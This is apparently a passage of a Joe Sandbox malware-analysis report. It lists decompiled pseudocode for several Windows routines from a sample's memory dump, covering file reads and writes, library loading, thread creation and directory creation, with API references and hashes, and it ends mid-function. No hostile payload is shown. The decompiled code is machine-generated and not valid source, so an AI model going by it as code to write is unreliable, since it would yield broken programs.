Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
String ID: riched20.dll
API String ID: 3498096277-3360196438
Opcode ID: 26724c0ea3f9802abaadf8aa4c438cdf7b7956a79f8988655ebdccf1a11d11c8
Instruction ID: 0102b81dd73b08f235962cf463777158fb619301579b16f6d2a490cb69b4beab
Opcode Fuzzy Hash: 26724c0ea3f9802abaadf8aa4c438cdf7b7956a79f8988655ebdccf1a11d11c8
Instruction Fuzzy Hash: C3F0F9B5D00209ABCB10EFA9D9499AFFBFCEF94700F00415AE415A2251DBB456068BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A39785 Relevance: 6.1, APIs: 4, Instructions: 56
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 59%

			E00A39785(void* __ecx, void* _a4, long _a8) {
				long _v8;
				int _t14;
				signed int _t15;
				void* _t25;

				_push(__ecx);
				_t25 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x10)) == 1) {
					 *(_t25 + 8) = GetStdHandle(0xfffffff6);
				}
				_t14 = ReadFile( *(_t25 + 8), _a4, _a8,  &_v8, 0); // executed
				if(_t14 != 0) {
					_t15 = _v8;
				} else {
					_t16 = E00A398BC(_t25);
					if(_t16 == 0) {
						L7:
						if( *((intOrPtr*)(_t25 + 0x10)) != 1) {
							L10:
							if( *((intOrPtr*)(_t25 + 0x10)) != 0 || _a8 <= 0x8000) {
								L14:
								_t15 = _t16 | 0xffffffff;
							} else {
								_t16 = GetLastError();
								if(_t16 != 0x21) {
									goto L14;
								} else {
									_push(0x8000);
									goto L6;
								}
							}
						} else {
							_t16 = GetLastError();
							if(_t16 != 0x6d) {
								goto L10;
							} else {
								_t15 = 0;
							}
						}
					} else {
						_t16 = 0x4e20;
						if(_a8 <= 0x4e20) {
							goto L7;
						} else {
							_push(0x4e20);
							L6:
							_push(_a4);
							_t15 = E00A39785(_t25);
						}
					}
				}
				return _t15;
			}

0x00a39788
0x00a3978a
0x00a39791
0x00a3979b
0x00a3979b
0x00a397ad
0x00a397b5
0x00a39811
0x00a397b7
0x00a397b9
0x00a397c0
0x00a397d9
0x00a397dd
0x00a397ee
0x00a397f2
0x00a3980c
0x00a3980c
0x00a397fe
0x00a397fe
0x00a39807
0x00000000
0x00a39809
0x00a39809
0x00000000
0x00a39809
0x00a39807
0x00a397df
0x00a397df
0x00a397e8
0x00000000
0x00a397ea
0x00a397ea
0x00a397ea
0x00a397e8
0x00a397c2
0x00a397c2
0x00a397ca
0x00000000
0x00a397cc
0x00a397cc
0x00a397cd
0x00a397cd
0x00a397d2
0x00a397d2
0x00a397ca
0x00a397c0
0x00a39817

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00A39795
ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00A397AD
GetLastError.KERNEL32 ref: 00A397DF
GetLastError.KERNEL32 ref: 00A397FE

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: 10dd4a9e2e2bcebf2e56fb63ad76fcf4edf40df538eb77560cc9ca2fcd2f7ea6
Instruction ID: e78275b49fb1405220fd1a93e9e83a9a819d3edfc687090ce9011541dfd2ad9e
Opcode Fuzzy Hash: 10dd4a9e2e2bcebf2e56fb63ad76fcf4edf40df538eb77560cc9ca2fcd2f7ea6
Instruction Fuzzy Hash: BA116131914604FBDF209F65C804A6B77B9FB86361F108929F426C52D0D7F4DE45DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A5AD34 Relevance: 6.1, APIs: 4, Instructions: 52
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E00A5AD34(signed int _a4) {
				signed int _t9;
				void* _t10;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0xa925d8 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0xa673f0 + _t9 * 4);
					_t10 = LoadLibraryExW(_t22, 0, 0x800); // executed
					_t27 = _t10;
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0xa7a040cf
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}

0x00a5ad39
0x00a5ad3d
0x00a5ad44
0x00a5ad48
0x00a5ad56
0x00a5ad66
0x00a5ad6c
0x00a5ad70
0x00a5ad99
0x00a5ad9b
0x00a5ad9f
0x00a5ada2
0x00a5ada2
0x00a5ada8
0x00a5adaa
0x00000000
0x00a5adab
0x00a5ad72
0x00a5ad7b
0x00a5ad8a
0x00a5ad7d
0x00a5ad80
0x00a5ad86
0x00a5ad86
0x00a5ad8e
0x00000000
0x00a5ad90
0x00a5ad93
0x00a5ad95
0x00000000
0x00a5ad95
0x00a5ad8e
0x00a5ad4a
0x00a5ad4f
0x00000000

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,00A540EF,00000000,00000000,?,00A5ACDB,00A540EF,00000000,00000000,00000000,?,00A5AED8,00000006,FlsSetValue), ref: 00A5AD66
GetLastError.KERNEL32(?,00A5ACDB,00A540EF,00000000,00000000,00000000,?,00A5AED8,00000006,FlsSetValue,00A67970,FlsSetValue,00000000,00000364,?,00A598B7), ref: 00A5AD72
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00A5ACDB,00A540EF,00000000,00000000,00000000,?,00A5AED8,00000006,FlsSetValue,00A67970,FlsSetValue,00000000), ref: 00A5AD80

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: b3a1e88f80ac577e47f006456edae25c8a0b1a06de82d5506010aa276ab886f4
Instruction ID: a6a02c0ace9c72d80d9924c72d928c7817558d222acb5e5c40eed418ff029aac
Opcode Fuzzy Hash: b3a1e88f80ac577e47f006456edae25c8a0b1a06de82d5506010aa276ab886f4
Instruction Fuzzy Hash: 10012433311226ABCB219BA8AC44B967BB8BF24BA37110320FC16D3550D730C80A86E1

Uniqueness

Uniqueness Score: -1.00%

Function 00A4101F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 67%

			E00A4101F() {
				long _v4;
				void* __ecx;
				void* __esi;
				void* __ebp;
				void* _t5;
				void* _t7;
				int _t8;
				void* _t12;
				void** _t18;
				void* _t22;

				_t12 = 0;
				if( *0xa71098 > 0) {
					_t18 = 0xa7109c;
					do {
						_t7 = CreateThread(0, 0x10000, E00A41160, 0xa71098, 0,  &_v4); // executed
						_t22 = _t7;
						_t25 = _t22;
						if(_t22 == 0) {
							_push(L"CreateThread failed");
							_push(0xa71098);
							E00A36C36(0xa71098);
							E00A36C31(E00A36DCB(0xa71098, _t25), 0xa71098, 0xa71098, 2);
						}
						 *_t18 = _t22;
						 *0x00A7119C =  *((intOrPtr*)(0xa7119c)) + 1;
						_t8 =  *0xa781e0; // 0x0
						if(_t8 != 0) {
							_t8 = SetThreadPriority( *_t18, _t8);
						}
						_t12 = _t12 + 1;
						_t18 =  &(_t18[1]);
					} while (_t12 <  *0xa71098);
					return _t8;
				}
				return _t5;
			}

0x00a41024
0x00a41028
0x00a4102c
0x00a4102f
0x00a41043
0x00a41049
0x00a4104b
0x00a4104d
0x00a4104f
0x00a41054
0x00a41059
0x00a41071
0x00a41071
0x00a41076
0x00a41078
0x00a4107e
0x00a41085
0x00a4108a
0x00a4108a
0x00a41090
0x00a41091
0x00a41094
0x00000000
0x00a41099
0x00a4109d

APIs

CreateThread.KERNELBASE ref: 00A41043
SetThreadPriority.KERNEL32(?,00000000), ref: 00A4108A

Part of subcall function 00A36C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A36C54

Part of subcall function 00A36DCB: _wcschr.LIBVCRUNTIME ref: 00A36E0A
Part of subcall function 00A36DCB: _wcschr.LIBVCRUNTIME ref: 00A36E19

Strings

CreateThread failed, xrefs: 00A4104F

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: Thread_wcschr$CreatePriority__vswprintf_c_l
String ID: CreateThread failed
API String ID: 2706921342-3849766595
Opcode ID: e3b71554090e07e5a64f8d159fe5cba5f5213fe81c52e0e81c4aec6499e52f3d
Instruction ID: 4708468d58fc2f5245c7ec31f7ca5cd910634c8b8535388f29cf390299294f97
Opcode Fuzzy Hash: e3b71554090e07e5a64f8d159fe5cba5f5213fe81c52e0e81c4aec6499e52f3d
Instruction Fuzzy Hash: 6201FEB93443097FD3309F689D52B7673A8FBC0751F20442DF64656180DAF16CC64624

Uniqueness

Uniqueness Score: -1.00%

Function 00A39F7A Relevance: 4.6, APIs: 3, Instructions: 111
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 68%

			E00A39F7A() {
				void* __ecx;
				void* __ebp;
				long _t37;
				void* _t42;
				void* _t46;
				signed int _t49;
				intOrPtr* _t53;
				void** _t54;
				DWORD* _t61;
				void* _t65;
				intOrPtr _t66;
				long _t67;
				intOrPtr* _t69;
				void* _t70;

				_t67 =  *(_t70 + 0x18);
				_t69 = _t53;
				if(_t67 != 0) {
					_t54 = _t69 + 8;
					 *(_t70 + 0xc) = _t54;
					if( *((intOrPtr*)(_t69 + 0x10)) != 1) {
						 *(_t70 + 0xc) = _t54;
					} else {
						_t46 = GetStdHandle(0xfffffff5);
						_t54 = _t69 + 8;
						 *_t54 = _t46;
					}
					while(1) {
						 *(_t70 + 0x10) =  *(_t70 + 0x10) & 0x00000000;
						_t49 = 0;
						if( *((intOrPtr*)(_t69 + 0x10)) == 0) {
							goto L13;
						}
						_t65 = 0;
						if(_t67 == 0) {
							L15:
							if( *((char*)(_t69 + 0x1e)) == 0 ||  *((intOrPtr*)(_t69 + 0x10)) != 0) {
								L22:
								 *((char*)(_t69 + 0xc)) = 1;
								return _t49;
							} else {
								_t64 = _t69 + 0x32;
								if(E00A36BAA(0xa71098, _t69 + 0x32, 0) == 0) {
									E00A36E98(0xa71098, _t69, 0, _t64);
									goto L22;
								}
								_t54 =  *(_t70 + 0x14);
								if( *(_t70 + 0x10) < _t67 &&  *(_t70 + 0x10) > 0) {
									_t66 =  *_t69;
									 *0xa63278(0);
									_t42 =  *((intOrPtr*)( *((intOrPtr*)(_t66 + 0x14))))();
									asm("sbb edx, 0x0");
									 *0xa63278(_t42 -  *(_t70 + 0x14), _t61);
									 *((intOrPtr*)(_t66 + 0x10))();
									_t67 =  *(_t70 + 0x20);
									_t54 =  *(_t70 + 0x14);
								}
								continue;
							}
						} else {
							goto L8;
						}
						while(1) {
							L8:
							_t37 = _t67 - _t65;
							if(_t37 >= 0x4000) {
								_t37 = 0x4000;
							}
							_t61 = _t70 + 0x14;
							_t13 = WriteFile( *_t54,  *(_t70 + 0x28) + _t65, _t37, _t61, 0) == 1;
							_t49 = _t49 & 0xffffff00 | _t13;
							if(_t13 != 0) {
								break;
							}
							_t54 =  *(_t70 + 0x14);
							_t65 = _t65 + 0x4000;
							if(_t65 < _t67) {
								continue;
							}
							break;
						}
						L14:
						if(_t49 != 0) {
							goto L22;
						}
						goto L15;
						L13:
						WriteFile( *_t54,  *(_t70 + 0x28), _t67, _t70 + 0x14, 0);
						asm("sbb bl, bl");
						_t49 = 1;
						goto L14;
					}
				}
				return 1;
			}

0x00a39f7e
0x00a39f82
0x00a39f86
0x00a39f93
0x00a39f96
0x00a39f9a
0x00a39fab
0x00a39f9c
0x00a39f9e
0x00a39fa4
0x00a39fa7
0x00a39fa7
0x00a39fb1
0x00a39fb1
0x00a39fb6
0x00a39fbc
0x00000000
0x00000000
0x00a39fbe
0x00a39fc2
0x00a3a024
0x00a3a028
0x00a3a0a2
0x00a3a0a5
0x00000000
0x00a3a030
0x00a3a032
0x00a3a042
0x00a3a09d
0x00000000
0x00a3a09d
0x00a3a044
0x00a3a04c
0x00a3a05d
0x00a3a067
0x00a3a06f
0x00a3a078
0x00a3a07d
0x00a3a085
0x00a3a088
0x00a3a08c
0x00a3a08c
0x00000000
0x00a3a04c
0x00000000
0x00000000
0x00000000
0x00a39fc4
0x00a39fc4
0x00a39fc6
0x00a39fcd
0x00a39fcf
0x00a39fcf
0x00a39fd6
0x00a39fee
0x00a39fee
0x00a39ff1
0x00000000
0x00000000
0x00a39ff3
0x00a39ff7
0x00a39fff
0x00000000
0x00000000
0x00000000
0x00a3a001
0x00a3a020
0x00a3a022
0x00000000
0x00000000
0x00000000
0x00a3a003
0x00a3a011
0x00a3a01c
0x00a3a01e
0x00000000
0x00a3a01e
0x00a39fb1
0x00000000

APIs

GetStdHandle.KERNEL32(000000F5,?,?,?,?,00A3D343,00000001,?,?,?,00000000,00A4551D,?,?,?), ref: 00A39F9E
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,00A4551D,?,?,?,?,?,00A44FC7,?), ref: 00A39FE5
WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,00A3D343,00000001,?,?), ref: 00A3A011

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: FileWrite$Handle
String ID:
API String ID: 4209713984-0
Opcode ID: 4885c3846e76ed51d121de9c250a54f26d4f19a6727f64d0aa9c1e333a74b052
Instruction ID: 512f177ef0da2664a6c3a69be25175ea57b31c8b8e1e873bc50b89c28ee92576
Opcode Fuzzy Hash: 4885c3846e76ed51d121de9c250a54f26d4f19a6727f64d0aa9c1e333a74b052
Instruction Fuzzy Hash: 2F31DF31208315AFDB18CF20D818BAFB7A5FF95711F00491DF8829B290C7B5AD49CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00A3A2B2 Relevance: 4.6, APIs: 3, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A3A2B2(void* __eflags, WCHAR* _a4, char _a8, intOrPtr _a12) {
				short _v4100;
				signed int _t11;
				void* _t14;
				void* _t17;
				int _t24;
				long _t25;
				WCHAR* _t26;
				void* _t27;

				_t27 = __eflags;
				E00A4EC50(0x1000);
				_t26 = _a4;
				_t11 =  *(E00A3C27E(_t27, _t26)) & 0x0000ffff;
				if(_t11 != 0x2e && _t11 != 0x20) {
					_t24 = CreateDirectoryW(_t26, 0); // executed
					if(_t24 != 0) {
						L6:
						if(_a8 != 0) {
							E00A3A4ED(_t26, _a12);
						}
						return 0;
					}
				}
				if(E00A3A231(_t26) == 0 && E00A3BB03(_t26,  &_v4100, 0x800) != 0 && CreateDirectoryW( &_v4100, 0) != 0) {
					goto L6;
				}
				_t25 = GetLastError();
				_t14 = 2;
				__eflags = _t25 - _t14;
				if(_t25 != _t14) {
					__eflags = _t25 - 3;
					_t17 = (0 | _t25 == 0x00000003) + 1;
					__eflags = _t17;
					return _t17;
				}
				return _t14;
			}

0x00a3a2b2
0x00a3a2ba
0x00a3a2c0
0x00a3a2c9
0x00a3a2cf
0x00a3a2d9
0x00a3a2e1
0x00a3a316
0x00a3a31a
0x00a3a320
0x00a3a320
0x00000000
0x00a3a325
0x00a3a2e1
0x00a3a2eb
0x00000000
0x00000000
0x00a3a32f
0x00a3a333
0x00a3a334
0x00a3a336
0x00a3a33a
0x00a3a340
0x00a3a340
0x00000000
0x00a3a340
0x00a3a343

APIs

Part of subcall function 00A3C27E: _wcslen.LIBCMT ref: 00A3C284

CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00A3A175,?,00000001,00000000,?,?), ref: 00A3A2D9
CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00A3A175,?,00000001,00000000,?,?), ref: 00A3A30C
GetLastError.KERNEL32(?,?,?,?,00A3A175,?,00000001,00000000,?,?), ref: 00A3A329

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: CreateDirectory$ErrorLast_wcslen
String ID:
API String ID: 2260680371-0
Opcode ID: 5887afa71498dc2fc1ec2e3519f179eec0497034bae61135af101228f568e978
Instruction ID: 3ed04bf6a9cde8b29f787e09cfaf92c51c1d9805e722c781e8eff13b48ba25f2
Opcode Fuzzy Hash: 5887afa71498dc2fc1ec2e3519f179eec0497034bae61135af101228f568e978
Instruction Fuzzy Hash: 0101D8395002306AEF21ABF59C49FFE335CAF29781F044414F982EA091D764CA82C6B6

Uniqueness

Uniqueness Score: -1.00%

Function 00A5B893 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00A5B893(void* __edx, intOrPtr _a4) {
				signed int _v8;
				char _v264;
				char _v520;
				char _v776;
				char _v1800;
				char _v1814;
				struct _cpinfo _v1820;
				intOrPtr _v1824;
				signed char _v1828;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t63;
				void* _t67;
				signed char _t68;
				intOrPtr _t69;
				void* _t72;
				char _t73;
				char _t74;
				signed char _t75;
				signed int _t76;
				signed char _t87;
				signed int _t90;
				signed int _t91;
				signed int _t93;
				char* _t94;
				intOrPtr _t96;
				signed int _t97;

				_t63 =  *0xa6e7ac; // 0xa7a040ce
				_v8 = _t63 ^ _t97;
				_t96 = _a4;
				_t4 = _t96 + 4; // 0x5efc4d8b
				if(GetCPInfo( *_t4,  &_v1820) == 0) {
					_t47 = _t96 + 0x119; // 0xa5bee6
					_t93 = _t47;
					_t87 = 0;
					_t67 = 0xffffff9f;
					_t68 = _t67 - _t93;
					__eflags = _t68;
					_v1828 = _t68;
					do {
						_t94 = _t93 + _t87;
						_t69 = _t68 + _t94;
						_v1824 = _t69;
						__eflags = _t69 + 0x20 - 0x19;
						if(_t69 + 0x20 > 0x19) {
							__eflags = _v1824 - 0x19;
							if(_v1824 > 0x19) {
								 *_t94 = 0;
							} else {
								_t72 = _t96 + _t87;
								_t57 = _t72 + 0x19;
								 *_t57 =  *(_t72 + 0x19) | 0x00000020;
								__eflags =  *_t57;
								_t59 = _t87 - 0x20; // -32
								_t73 = _t59;
								goto L24;
							}
						} else {
							 *(_t96 + _t87 + 0x19) =  *(_t96 + _t87 + 0x19) | 0x00000010;
							_t54 = _t87 + 0x20; // 0x20
							_t73 = _t54;
							L24:
							 *_t94 = _t73;
						}
						_t68 = _v1828;
						_t61 = _t96 + 0x119; // 0xa5bee6
						_t93 = _t61;
						_t87 = _t87 + 1;
						__eflags = _t87 - 0x100;
					} while (_t87 < 0x100);
				} else {
					_t74 = 0;
					do {
						 *((char*)(_t97 + _t74 - 0x104)) = _t74;
						_t74 = _t74 + 1;
					} while (_t74 < 0x100);
					_t75 = _v1814;
					_t90 =  &_v1814;
					_v264 = 0x20;
					while(1) {
						_t103 = _t75;
						if(_t75 == 0) {
							break;
						}
						_t93 =  *(_t90 + 1) & 0x000000ff;
						_t76 = _t75 & 0x000000ff;
						while(1) {
							__eflags = _t76 - _t93;
							if(_t76 > _t93) {
								break;
							}
							__eflags = _t76 - 0x100;
							if(_t76 < 0x100) {
								 *((char*)(_t97 + _t76 - 0x104)) = 0x20;
								_t76 = _t76 + 1;
								__eflags = _t76;
								continue;
							}
							break;
						}
						_t90 = _t90 + 2;
						__eflags = _t90;
						_t75 =  *_t90;
					}
					_t13 = _t96 + 4; // 0x5efc4d8b
					E00A5C988(_t93, _t103, 0, 1,  &_v264, 0x100,  &_v1800,  *_t13, 0);
					_t16 = _t96 + 4; // 0x5efc4d8b
					_t19 = _t96 + 0x21c; // 0xdb855708
					E00A5AB78(0, _t103, 0,  *_t19, 0x100,  &_v264, 0x100,  &_v520, 0x100,  *_t16, 0); // executed
					_t21 = _t96 + 4; // 0x5efc4d8b
					_t23 = _t96 + 0x21c; // 0xdb855708
					E00A5AB78(0, _t103, 0,  *_t23, 0x200,  &_v264, 0x100,  &_v776, 0x100,  *_t21, 0);
					_t91 = 0;
					do {
						_t68 =  *(_t97 + _t91 * 2 - 0x704) & 0x0000ffff;
						if((_t68 & 0x00000001) == 0) {
							__eflags = _t68 & 0x00000002;
							if((_t68 & 0x00000002) == 0) {
								 *(_t96 + _t91 + 0x119) = 0;
							} else {
								_t37 = _t96 + _t91 + 0x19;
								 *_t37 =  *(_t96 + _t91 + 0x19) | 0x00000020;
								__eflags =  *_t37;
								_t68 =  *((intOrPtr*)(_t97 + _t91 - 0x304));
								goto L15;
							}
						} else {
							 *(_t96 + _t91 + 0x19) =  *(_t96 + _t91 + 0x19) | 0x00000010;
							_t68 =  *((intOrPtr*)(_t97 + _t91 - 0x204));
							L15:
							 *(_t96 + _t91 + 0x119) = _t68;
						}
						_t91 = _t91 + 1;
					} while (_t91 < 0x100);
				}
				return E00A4FBBC(_t68, 0, _v8 ^ _t97, _t93, 0x100, _t96);
			}

0x00a5b89e
0x00a5b8a5
0x00a5b8aa
0x00a5b8b5
0x00a5b8c7
0x00a5b9bf
0x00a5b9bf
0x00a5b9c5
0x00a5b9c7
0x00a5b9c8
0x00a5b9c8
0x00a5b9ca
0x00a5b9d0
0x00a5b9d0
0x00a5b9d2
0x00a5b9d4
0x00a5b9dd
0x00a5b9e0
0x00a5b9ec
0x00a5b9f3
0x00a5ba03
0x00a5b9f5
0x00a5b9f5
0x00a5b9f8
0x00a5b9f8
0x00a5b9f8
0x00a5b9fc
0x00a5b9fc
0x00000000
0x00a5b9fc
0x00a5b9e2
0x00a5b9e2
0x00a5b9e7
0x00a5b9e7
0x00a5b9ff
0x00a5b9ff
0x00a5b9ff
0x00a5ba05
0x00a5ba0b
0x00a5ba0b
0x00a5ba11
0x00a5ba12
0x00a5ba12
0x00a5b8cd
0x00a5b8cd
0x00a5b8cf
0x00a5b8cf
0x00a5b8d6
0x00a5b8d7
0x00a5b8db
0x00a5b8e1
0x00a5b8e7
0x00a5b90f
0x00a5b90f
0x00a5b911
0x00000000
0x00000000
0x00a5b8f0
0x00a5b8f4
0x00a5b906
0x00a5b906
0x00a5b908
0x00000000
0x00000000
0x00a5b8f9
0x00a5b8fb
0x00a5b8fd
0x00a5b905
0x00a5b905
0x00000000
0x00a5b905
0x00000000
0x00a5b8fb
0x00a5b90a
0x00a5b90a
0x00a5b90d
0x00a5b90d
0x00a5b914
0x00a5b929
0x00a5b92f
0x00a5b943
0x00a5b94a
0x00a5b959
0x00a5b96b
0x00a5b972
0x00a5b97a
0x00a5b97c
0x00a5b97c
0x00a5b986
0x00a5b996
0x00a5b998
0x00a5b9af
0x00a5b99a
0x00a5b99a
0x00a5b99a
0x00a5b99a
0x00a5b99f
0x00000000
0x00a5b99f
0x00a5b988
0x00a5b988
0x00a5b98d
0x00a5b9a6
0x00a5b9a6
0x00a5b9a6
0x00a5b9b6
0x00a5b9b7
0x00a5b9bb
0x00a5ba26

APIs

GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00A5B8B8

Strings

, xrefs: 00A5B8FD

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: dc5e3ca35d6bf0757ee766c8e422393056e5d587998c957d39b295a653184547
Instruction ID: 03d1542b240be4011b9cd2ee04c05adc3f982fef929f6158a547a224d85b95b0
Opcode Fuzzy Hash: dc5e3ca35d6bf0757ee766c8e422393056e5d587998c957d39b295a653184547
Instruction Fuzzy Hash: FD41F87050428C9EDF218F658C84BE6BBB9FB55306F1404EDEA9A86142D335AA49CB70

Uniqueness

Uniqueness Score: -1.00%

Function 00A5AF6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 35%

			E00A5AF6C(void* __ebx, void* __ecx, void* __edi, void* __eflags, intOrPtr _a4, int _a8, short* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				void* __esi;
				signed int _t18;
				intOrPtr* _t20;
				int _t22;
				void* _t30;
				intOrPtr* _t33;
				void* _t34;
				signed int _t35;

				_t31 = __edi;
				_t26 = __ecx;
				_t25 = __ebx;
				_push(__ecx);
